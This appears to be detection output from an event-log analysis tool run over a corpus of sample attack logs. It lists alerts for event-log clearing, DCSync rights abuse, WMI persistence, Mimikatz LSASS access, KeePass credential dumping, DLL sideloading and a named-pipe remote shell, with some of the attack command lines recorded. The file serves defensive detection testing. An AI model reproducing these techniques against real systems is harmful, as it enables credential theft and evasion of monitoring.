DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:19:04.187 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe SYSTEM : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:19:10.796 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" : Path: C:\Windows\System32\mmc.exe : User: EXAMPLE\user01 : 
Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:20:19.155 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:20:19.205 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:20:19.295 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""c:\osk.exe"" : Path: C:\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:21:01.325 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Windows Media Player\wmpnetwk.exe"" : Path: C:\Program Files\Windows Media Player\wmpnetwk.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:21:48.323 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k 
DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:23:41.105 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:34:25.894 +09:00,PC01.example.corp,104,high,System log file was cleared,User: user01,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_104_system_log_cleared.evtx -2019-03-20 08:35:07.524 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_1102_security_log_cleared.evtx -2019-03-25 18:09:14.916 +09:00,DC1.insecurebank.local,1102,high,Security log was cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ACL_ForcePwd_SPNAdd_User_Computer_Accounts.evtx -2019-03-26 06:28:11.073 +09:00,DC1.insecurebank.local,1102,high,Security log was cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.022 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend 
Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.022 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 
-2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend 
Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-04-04 03:11:54.098 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Users\user01\Desktop\WMIGhost.exe"" : Path: C:\Users\user01\Desktop\WMIGhost.exe : User: PC04\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx -2019-04-04 03:11:54.178 +09:00,PC04.example.corp,20,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx 
-2019-04-04 03:11:54.178 +09:00,PC04.example.corp,20,high,Suspicious Scripting in a WMI Consumer,,rules/sigma/wmi_event/sysmon_wmi_susp_scripting.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx -2019-04-04 03:11:54.198 +09:00,PC04.example.corp,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx -2019-04-04 03:12:00.016 +09:00,PC04.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wbem\scrcons.exe -Embedding : Path: C:\Windows\System32\wbem\scrcons.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx -2019-04-04 03:12:00.016 +09:00,PC04.example.corp,1,high,WMI Persistence - Script Event Consumer,,rules/sigma/process_creation/win_wmi_persistence_script_event_consumer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx -2019-04-19 01:55:37.125 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\Sysmon.exe : Path: C:\Windows\Sysmon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 01:55:37.125 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\wbem\unsecapp.exe -Embedding : Path: C:\Windows\System32\wbem\unsecapp.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 01:55:44.045 +09:00,IEWIN7,1,informational,Process Creation,"Command: sysmon -c 
sysmonconfig-18-apr-2019.xml : Path: C:\Users\IEUser\Desktop\Sysmon.exe : User: IEWIN7\IEUser : Parent Command: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 01:56:08.370 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 01:56:08.370 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell : Command: Powershell : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IEWIN7\IEUser : Parent Command: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 01:56:24.893 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 01:56:24.893 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 01:56:24.893 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1033,technique_name=System Owner/User Discovery : Command: ""C:\Windows\system32\whoami.exe"" /user : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: Powershell",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 01:57:04.681 +09:00,IEWIN7,1,high,Process Creation Sysmon 
Rule Alert,"Rule: technique_id=T1088,technique_name=Bypass User Account Control : Command: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" : Path: C:\Windows\System32\mmc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\eventvwr.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,Mimikatz Detection LSASS Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 02:00:09.977 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 02:00:09.977 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 02:00:09.977 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1033,technique_name=System Owner/User Discovery : Command: ""C:\Windows\system32\whoami.exe"" /user : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: 
Powershell",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,Mimikatz Detection LSASS Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-28 00:57:53.368 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading : Command: ""C:\Users\IEUser\Downloads\Flash_update.exe"" : Path: C:\Users\IEUser\Downloads\Flash_update.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx -2019-04-28 00:57:53.368 +09:00,IEWIN7,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx -2019-04-28 00:57:53.837 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading : Command: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe"" : Path: C:\Users\IEUser\AppData\Roaming\NvSmart.exe : User: IEWIN7\IEUser : 
Parent Command: ""C:\Users\IEUser\Downloads\Flash_update.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx -2019-04-28 00:57:53.884 +09:00,IEWIN7,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx -2019-04-28 00:57:53.884 +09:00,IEWIN7,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx -2019-04-28 00:57:53.931 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: cmd.exe /A : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx -2019-04-28 00:57:53.931 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx -2019-04-28 00:57:54.134 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: ""C:\Windows\System32\cmd.exe"" /c del /q ""C:\Users\IEUser\Downloads\Flash_update.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\Flash_update.exe"" 
",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx -2019-04-28 03:47:00.046 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading : Command: KeeFarce.exe : Path: C:\Users\Public\KeeFarce.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx -2019-04-28 03:47:00.046 +09:00,IEWIN7,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx -2019-04-28 03:55:04.710 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx -2019-04-28 03:55:04.710 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx -2019-04-28 03:55:04.980 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx -2019-04-28 03:55:04.980 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx -2019-04-28 04:27:55.274 +09:00,IEWIN7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_chrome_firefox_opera_4663.evtx -2019-04-28 06:04:25.733 +09:00,DESKTOP-JR78RLP,104,high,System log file was cleared,User: jwrig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx -2019-04-28 06:06:49.341 +09:00,DESKTOP-JR78RLP,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx -2019-04-28 06:06:49.341 +09:00,DESKTOP-JR78RLP,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx -2019-04-29 01:29:42.988 +09:00,IEWIN7,10,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/process_suspend_sysmon_10_ga_800.evtx -2019-04-29 01:29:42.988 +09:00,IEWIN7,10,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/process_suspend_sysmon_10_ga_800.evtx -2019-04-30 05:59:14.447 +09:00,IEWIN7,18,critical,Malicious Named 
Pipe,,rules/sigma/pipe_created/sysmon_mal_namedpipes.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx -2019-04-30 05:59:21.539 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx -2019-04-30 05:59:21.539 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx -2019-04-30 05:59:21.539 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx -2019-04-30 05:59:22.144 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" /all : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx -2019-04-30 05:59:22.144 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx -2019-04-30 05:59:22.144 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
